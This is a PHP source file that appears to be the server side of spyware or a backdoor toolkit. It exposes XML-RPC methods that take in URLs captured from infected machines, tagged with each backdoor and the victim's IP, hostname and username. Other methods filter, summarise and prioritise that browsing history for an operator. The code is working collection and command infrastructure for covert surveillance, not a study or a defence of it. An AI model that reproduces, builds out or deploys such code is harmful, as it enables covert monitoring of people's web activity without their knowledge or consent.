<?php

//////////
///
///   log_url.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

if($al & AL_SERV) {
   $dm['log_url.add']                 ['function'] = 'log_url_add';
//   $dm['log_url.add']                ['signature'] = array(array($xmlrpcBoolean,     // return value
//                                                                 $xmlrpcString,      // $backdoor
//                                                                 $xmlrpcString,      // $remoteip
//                                                                 $xmlrpcString,      // $remotehost
//                                                                 $xmlrpcString,      // $remoteuser
//                                                                 $xmlrpcArray));     // $logarray
}

if($al & AL_VIEW) {
   $dm['log_url.getparam']            ['function'] = 'log_url_getparam';
//   $dm['log_url.getparam']           ['signature'] = array(array($xmlrpcStruct,      // return value
//                                                                 $xmlrpcArray,       // $selarray
//                                                                 $xmlrpcArray,       // $backdoorarray
//                                                                 $xmlrpcArray,       // $remoteiparray
//                                                                 $xmlrpcArray,       // $remotehostarray
//                                                                 $xmlrpcArray,       // $remoteuserarray
//                                                                 $xmlrpcArray,       // $tagarray
//                                                                 $xmlrpcArray,       // $acquiredarray
//                                                                 $xmlrpcString));    // $searchstring
}

if($al & AL_VIEW) {
   $dm['log_url.getgeneral']          ['function'] = 'log_url_getgeneral';
//   $dm['log_url.getgeneral']         ['signature'] = array(array($xmlrpcArray,       // return value
//                                                                 $xmlrpcArray,       // $selarray
//                                                                 $xmlrpcArray,       // $backdoorarray
//                                                                 $xmlrpcArray,       // $remoteiparray
//                                                                 $xmlrpcArray,       // $remotehostarray
//                                                                 $xmlrpcArray,       // $remoteuserarray
//                                                                 $xmlrpcArray,       // $tagarray
//                                                                 $xmlrpcArray,       // $acquiredarray
//                                                                 $xmlrpcString,      // $searchstring
//                                                                 $xmlrpcArray,       // $domainarray
//                                                                 $xmlrpcBoolean));   // $pagecheck
}

if($al & AL_VIEW) {
   $dm['log_url.getdetail']           ['function'] = 'log_url_getdetail';
//   $dm['log_url.getdetail']          ['signature'] = array(array($xmlrpcArray,       // return value
//                                                                 $xmlrpcArray,       // $selarray
//                                                                 $xmlrpcArray,       // $backdoorarray
//                                                                 $xmlrpcArray,       // $remoteiparray
//                                                                 $xmlrpcArray,       // $remotehostarray
//                                                                 $xmlrpcArray,       // $remoteuserarray
//                                                                 $xmlrpcArray,       // $tagarray
//                                                                 $xmlrpcArray,       // $acquiredarray
//                                                                 $xmlrpcString,      // $searchstring
//                                                                 $xmlrpcArray,       // $domainarray
//                                                                 $xmlrpcArray,       // $pagearray
//                                                                 $xmlrpcInt));       // $limit
}

if($al & AL_VIEW) {
   $dm['log_url.setgrouppriority']    ['function'] = 'log_url_setgrouppriority';
//   $dm['log_url.setgrouppriority']   ['signature'] = array(array($xmlrpcBoolean,     // return value
//                                                                 $xmlrpcArray,       // $selarray
//                                                                 $xmlrpcArray,       // $linearray
//                                                                 $xmlrpcInt));       // $priority
}



/***************\
*   FUNCTIONS   *
\***************/

function log_url_add($backdoor, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= [domain(url)]
   // varchar2  <= [page(url)]
   // varchar3  <= -
   // int1      <= -
   // int2      <= -
   // int3      <= -
   // longtext1 <= url
   // longblob1 <= -

   foreach($logarray as &$log) {
      preg_match('{^(?:[a-z]+://)?(?:[^/]*@)?(?P<page>(?P<domain>[a-z0-9.-]+)[^?]*)}i', $log['url'], $matches);
      $log['domain'] = (isset($matches['domain']) ? $matches['domain'] : '');
      $log['page'] = (isset($matches['page']) ? $matches['page'] : '');
   }
   unset($log);

   $ret = db_escape(array(&$backdoor,
                          &$remoteip,
                          &$remotehost,
                          &$remoteuser,
                          &$logarray));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `backdoor_id` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor` = '$backdoor'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['invbackdoor'];
   }

   $backdoor_id = $ret[0]->backdoor_id;

   foreach($logarray as $log) {
      $sql  = "INSERT INTO `log` (`backdoor_id`, ";
      $sql .=                    "`type`, ";
      $sql .=                    "`remoteip`, ";
      $sql .=                    "`remotehost`, ";
      $sql .=                    "`remoteuser`, ";
      $sql .=                    "`received`, ";
      $sql .=                    "`acquired`, ";
      $sql .=                    "`varchar1`, ";
      $sql .=                    "`varchar2`, ";
      $sql .=                    "`longtext1`) ";
      $sql .= "VALUES ('$backdoor_id', ";
      $sql .=         "'URL', ";
      $sql .=         "'$remoteip', ";
      $sql .=         "'$remotehost', ";
      $sql .=         "'$remoteuser', ";
      $sql .=         "UTC_TIMESTAMP(), ";
      $sql .=         "'".str_replace(':', '', $log['acquired']->scalar)."', ";
      $sql .=         "'".$log['domain']."', ";
      $sql .=         "'".$log['page']."', ";
      $sql .=         "'".$log['url']."')";

      $log = false;

      $ret = db_query($sql);

      if(is_object($ret)) {
         return $ret;
      }
   }

   return true;
}

function log_url_getparam($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT DISTINCT `varchar1` AS `domain` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'URL')";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? " AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."'))" : '');
   }
   if(count($acquiredarray)) {
      $sql .= " AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ")";
   }
   if($searchstring) {
      $sql .= " AND (0";
      foreach(array('longtext1') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ")";
   }

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach(array('domain') as $field) {
      $tmp->$field = array();
      foreach($ret as $r) {
         array_push($tmp->$field, $r->$field);
      }
      $tmp->$field = array_unique($tmp->$field);
      sort($tmp->$field);
   }

   $ret = $tmp;

   return $ret;
}

function log_url_getgeneral($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring, $domainarray, $pagecheck)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring,
                          &$domainarray,
                          &$pagecheck));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT COUNT(`log_id`) AS `count`, ";
   $sql .=        "DATE_FORMAT(MIN(`acquired`), '%Y%m%dT%T') AS `begin`, ";
   $sql .=        "DATE_FORMAT(MAX(`acquired`), '%Y%m%dT%T') AS `end`, ";
   $sql .=        "LEAST(SUM(LENGTH(`longtext1`)), 1073741825) AS `size`, ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray') as $field) {
      $sql .= (count($$field) ? "`".str_replace('array', '', $field)."`, " : '');
   }
   $sql .= (count($domainarray) ? "`varchar1` AS `domain`, " : '');
   $sql .= ($pagecheck ? "`varchar2` AS `page`, " : '');
   $sql .= ($pagecheck ? '' : "COUNT(DISTINCT `varchar2`) AS `pagecount`, ");
   $sql .=        "MAX(`tag`) AS `priority` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'URL') ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? "AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."')) " : '');
   }
   if(count($acquiredarray)) {
      $sql .= "AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ") ";
   }
   if($searchstring) {
      $sql .= "AND (0";
      foreach(array('longtext1') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ") ";
   }
   $sql .= (count($domainarray) ? "AND (`varchar1` IN ('".implode("', '", $domainarray)."')) " : '');
   $sql .= "GROUP BY `type`";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? ", `".str_replace('array', '', $field)."`" : '');
   }
   $sql .= (count($domainarray) ? ", `varchar1`" : '');
   $sql .= ($pagecheck ? ", `varchar2`" : '');

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->count, 'integer');
      xmlrpc_set_type($r->begin, 'datetime');
      xmlrpc_set_type($r->end, 'datetime');
      if(isset($r->pagecount)) {
         settype($r->pagecount, 'integer');
      }
      settype($r->priority, 'integer');
   }
   unset($r);

   return $ret;
}

function log_url_getdetail($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring, $domainarray, $pagearray, $limit = -1)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring,
                          &$domainarray,
                          &$pagearray,
                          &$limit));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `log_id` AS `log`, ";
   $sql .=        "`backdoor`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "DATE_FORMAT(`acquired`, '%Y%m%dT%T') AS `acquired`, ";
   $sql .=        "DATE_FORMAT(`received`, '%Y%m%dT%T') AS `received`, ";
   $sql .=        "`varchar1` as `domain`, ";
   $sql .=        "`varchar2` as `page`, ";
   $sql .=        "`longtext1` as `url`, ";
   $sql .=        "`tag` AS `priority`, ";
   $sql .=        "COUNT(`note_id`) AS `notecount` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "LEFT JOIN `note` USING (`log_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'URL') ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? "AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."')) " : '');
   }
   if(count($acquiredarray)) {
      $sql .= "AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ") ";
   }
   if($searchstring) {
      $sql .= "AND (0";
      foreach(array('varchar1', 'varchar2', 'longtext1') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ") ";
   }
   $sql .= (count($domainarray) ? "AND (`varchar1` IN ('".implode("', '", $domainarray)."')) " : '');
   $sql .= (count($pagearray) ? "AND (`varchar2` IN ('".implode("', '", $pagearray)."')) " : '');
   $sql .= "GROUP BY `log_id`";
   if($limit >= 0) {
      $sql .= " ORDER BY `log_id` DESC";
      $sql .= " LIMIT $limit";
   }

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->log, 'integer');
      xmlrpc_set_type($r->acquired, 'datetime');
      xmlrpc_set_type($r->received, 'datetime');
      settype($r->priority, 'integer');
      settype($r->notecount, 'integer');
   }
   unset($r);

   return $ret;
}

function log_url_setgrouppriority($selarray, $linearray, $priority)
{
   $ret = db_escape(array(&$selarray,
                          &$linearray,
                          &$priority));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "REPLACE INTO `log` (`log_id`, ";
   $sql .=                     "`tag`, ";
   $sql .=                     "`type`, ";
   $sql .=                     "`backdoor_id`, ";
   $sql .=                     "`remoteip`, ";
   $sql .=                     "`remotehost`, ";
   $sql .=                     "`remoteuser`, ";
   $sql .=                     "`received`, ";
   $sql .=                     "`acquired`, ";
   $sql .=                     "`varchar1`, ";
   $sql .=                     "`varchar2`, ";
   $sql .=                     "`varchar3`, ";
   $sql .=                     "`int1`, ";
   $sql .=                     "`int2`, ";
   $sql .=                     "`int3`, ";
   $sql .=                     "`longtext1`, ";
   $sql .=                     "`longblob1`) ";
   $sql .= "SELECT `log_id`, ";
   $sql .=        "$priority, ";
   $sql .=        "`type`, ";
   $sql .=        "`backdoor_id`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`received`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`varchar3`, ";
   $sql .=        "`int1`, ";
   $sql .=        "`int2`, ";
   $sql .=        "`int3`, ";
   $sql .=        "`longtext1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`type` = 'URL') AND ";
   if(count($linearray)) {
      $sql .= "(0";
      foreach($linearray as $line) {
         $sql .= " OR (1";
         foreach(array('backdoor', 'remoteip', 'remotehost', 'remoteuser') as $field) {
            $sql .= (isset($line[$field]) ? " AND (`$field` = '".$line[$field]."')" : '');
         }
         $sql .= (isset($line['priority']) ? " AND (`tag` = '".$line['priority']."')" : '');
         if(isset($line['search']) && $line['search']) {
            $sql .= " AND (0";
            foreach(array('varchar1', 'varchar2', 'longtext1') as $field) {
               $sql .= " OR (`$field` REGEXP '".$line['search']."')";
            }
            $sql .= ")";
         }
         if(isset($line['begin']) && isset($line['end'])) {
            $sql .= " AND (`acquired` BETWEEN '".str_replace(':', '', $line['begin']->scalar)."' AND '".str_replace(':', '', $line['end']->scalar)."')";
         }
         $sql .= (isset($line['domain']) ? " AND (`varchar1` = '".$line['domain']."')" : '');
         $sql .= (isset($line['page']) ? " AND (`varchar2` = '".$line['page']."')" : '');
         $sql .= ")";
      }
      $sql .= ") AND ";
   }
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."')";

   $ret = db_query($sql);

   return $ret;
}

?>
